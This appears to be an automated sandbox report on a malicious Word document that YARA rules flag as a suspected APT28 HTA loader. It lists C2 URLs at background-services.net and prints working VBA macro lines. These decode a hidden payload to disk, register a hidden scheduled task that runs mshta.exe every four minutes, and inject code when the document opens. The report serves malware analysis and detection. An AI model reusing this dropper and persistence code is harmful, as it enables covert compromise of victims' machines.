5b 34 2b 5c d0 f8 9c c8 9f 6d 7e 65 ef a2 3b f8 26 62 78 e5 95 f7 f7 be a8 aa 02 ac c0 e7 b9 eb 83 2f d3 6f bc 10 e7 29 0f 28 fc 21 61 b0 dd 5e b9 9d 9e c9 c3 3e 9e 9f 38 ba 35 f3 8b 6c 42 77 03 33 d0 47 16 35 f1 01 8f 49 60 bb 2d 44 02 9e 73 55 d7 60 7c b0 9b c1 6e 03 97 b9 73 29 2b fd 76 b1 f1 62 c3 bf 38 03 03 d8 8b 95 b0 bd 5b a3 27 8e 38 61 97 1d b9 ee 14 32 26 b4 87 d1 44 39 f8 65 76 40 f7 47 f1 8e 37 3c a9 1c 90 21 7e 93 dd 0e 64 25 f9 04 23 25 31 2a c0 cc ca 78 80 46 66 37 82 0e cc 98 dc 6b 45 4e ae 78 5f 21 f9 ce 33 f0 51 8e 95 f2 9d 74 ee 55 0b 44 19 88 88 cb c8 38 ee 31 13 e8 03 31 e6 fd ce cc 88 9a b2 41 42 23 a6 8e 03 41 9f 6b c2 37 7c 01 fd 79 46 de e1 b7 1a 37 7b 95 f8 54 7b 29 71 4a 64 b3 4c 7b 03 43 67 00 1c 86 ef a2 82 fd 4b 47 f7 3d 2a 1c 2a 56 fc 45 64 91 b5 ce 60 30 09 06 fb a6 de e6 29 c4 26 2c d2 ba 84 65 67 b4 9e bb eb f5 54 f8 88 9a 42 5a ac 3d cb ba 3f a3 ed 08 fa 56 dd 06 43 d6 9c ab 8f 08 ff 6a 4d 8f 9d 14 1e 81 be 62 3d 7a 22 0b f0 af 45 1a a2 14 b5 5a 0b 62 94 ff b0 30 fe c7 9a 68 8b 0a cf 6c 25 d7 fb ac 74 c1 2d 34 af b6 a0 f6 6c b6 f6 88 7f 53 f7 77 20 dd 19 e3 55 c6 d9 29 05 3e 7c ac ce de 31 e3 5f 19 8f 8a 77 c4 10 99 42 b5 c8 51 81 e9 75 e2 dc 0a 4c 2f 4f 67 42 bb 53 86 b2 3b d1 77 5c d9 ea c7 5c a1 aa ae 8f 0e f2 e3 9b 4d b6 ce 31 1e a4 bd 32 06 bc f7 02 74 4c 03 e4 58 bf 5a a8 33 fe 53 fb 19 93 a3 42 5e 79 3c e3 63 54 31 c4 c9 ff 1d 31 2c ae 88 4c 60 51 56 3b 54 10 55 30 8c a0 81 5f f4 9b 88 81 d4 d1 1b 69 47 09 cc bf 43 c1 24 39 1f 19 fd 22 24 e7 47 af 8f 0a c1 0a 93 99 63 94 ff 65 be f8 38 0a 4e 1b b6 f8 ea 5d 44 26 9e b5 56 dc d9 65 1f 55 68 ce 4b 13 29 3b c7 99 27 1f 60 38 b5 df d1 b7 3e 8c c7 8b 84 07 7b 51 57 81 c8 7d e4 30 7b c4 81 68 63 5c 96 e0 76 4a 41 97 68 9c 0f 65 99 ac 47 4f 1d d2 7e d0 e9 2d b0 5c e7 a7 19 f3 60 88 28 f6 5a 23 23 2c 7a de 99 31 91 3d cb ec f4 83 3f 4a eb 9d 5d 1e 33 d2 eb 94 34 e4 b2 e7 91 81 d9 6f cf 1c f1 99 23 35 66 2e ce c6 80 30 7a ce d9 ed 63 32 eb bd e1 4d 07 ef 7d 86 91 cd c9 e4 65 4e b8 95 f8 46 65 ef d3 41 eb
Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: background-services.net
Source: mshta.exe, 00000009.00000003.1745355594.000002308190B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1745355594.0000023081901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2965303369.00000230D8B89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.php
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.php.Foundation.Diagnostics.AsyncCausalityTracertPr
Source: mshta.exe, 00000009.00000002.2964616847.0000023083205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.php2P
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpB
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpP.y
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpTime
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpWh
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpet0
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpiP
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpj.s
Source: mshta.exe, 00000009.00000002.2964616847.0000023083205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phplate
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpn
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpndows
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpvices.net/local.php
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpvices.net/local.phpder
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.phpvices.net/local.phpf.O
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/local.php~
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/setup.php
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/setup.php?i
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/setup.phpIi
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.net/setup.phpOh
Source: mshta.exe, 00000009.00000003.1745355594.0000023081901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.netE02
Source: mshta.exe, 00000009.00000002.2964085366.0000023081CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://background-services.netttings
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://df.loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://dod.loki.office365.us
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://gcc.loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://gcchigh.loki.office365.us
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://github.com/react-native-community/react-native-async-storage/issues
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://loki.delve.office.de
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://loki.office365.cn
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://loki.officenet.eaglex.ic.gov
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://loki.officenet.microsoft.scloud
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://msit.loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drString found in binary or memory: https://react-native-community.github.io/async-storage/docs/advanced/jest
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59244
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59251
Source: unknownNetwork traffic detected: HTTP traffic on port 59251 -> 443
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59244 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59246 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59251 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: settings.xml, type: SAMPLEMatched rule: Detects some suspected APT28 document settings.xml Author: Sekoia.io
Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: Process Memory Space: mshta.exe PID: 1460, type: MEMORYSTRMatched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Settings\locale, type: DROPPEDMatched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Document contains an embedded VBA macro with suspicious strings
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE, VBA macro line: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String environ: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")Name: documeNt_opEn
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale": Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale": Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale": Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String ThisDocument
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Source: Rev5_ Joint Declaration C5 GER_track changes.docStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0000.tmp.0.drStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0001.tmp.7.drStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, environ
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE, VBA macro line: Sub documeNt_opEn()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEnName: documeNt_opEn
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Set doc2 = JbxHook_Open_1__ob_set(14, objApp.Documents, namedoc)
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Sub documeNt_opEn()
Source: ~WRD0000.tmp.7.drOLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: ~WRD0001.tmp.7.drOLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
Source: ~WRD0000.tmp.7.drOLE indicator, VBA macros: true
Source: ~WRD0001.tmp.7.drOLE indicator, VBA macros: true
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: settings.xml, type: SAMPLEMatched rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml author = Sekoia.io, description = Detects some suspected APT28 document settings.xml, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = fd104985-6441-4fb6-8cc1-30afa4a7797b, hash = 0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a
Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: Process Memory Space: mshta.exe PID: 1460, type: MEMORYSTRMatched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: C:\Users\user\AppData\Local\Settings\locale, type: DROPPEDMatched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: classification engineClassification label: mal92.expl.evad.winDOC@5/14@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$v5_ Joint Declaration C5 GER_track changes.docJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{82C13F39-4118-470A-A2BC-806DFFCD0D1D} - OProcSessId.datJump to behavior
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.7.drOLE indicator, Word Document stream: true
Source: ~WRD0001.tmp.7.drOLE indicator, Word Document stream: true
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE document summary: title field not present or empty
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE document summary: author field not present or empty
Source: Rev5_ Joint Declaration C5 GER_track changes.docOLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRD0000.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.7.drOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.7.drOLE document summary: edited time not present or 0
Source: ~WRD0001.tmp.7.drOLE document summary: title field not present or empty
Source: ~WRD0001.tmp.7.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Rev5_ Joint Declaration C5 GER_track changes.docReversingLabs: Detection: 34%
Source: Rev5_ Joint Declaration C5 GER_track changes.docVirustotal: Detection: 42%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: directxdatabasehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Rev5_ Joint Declaration C5 GER_track changes.docInitial sample: OLE zip file path = word/comments.xml
Source: Rev5_ Joint Declaration C5 GER_track changes.docInitial sample: OLE zip file path = word/commentsExtended.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/comments.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/commentsExtended.xml
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
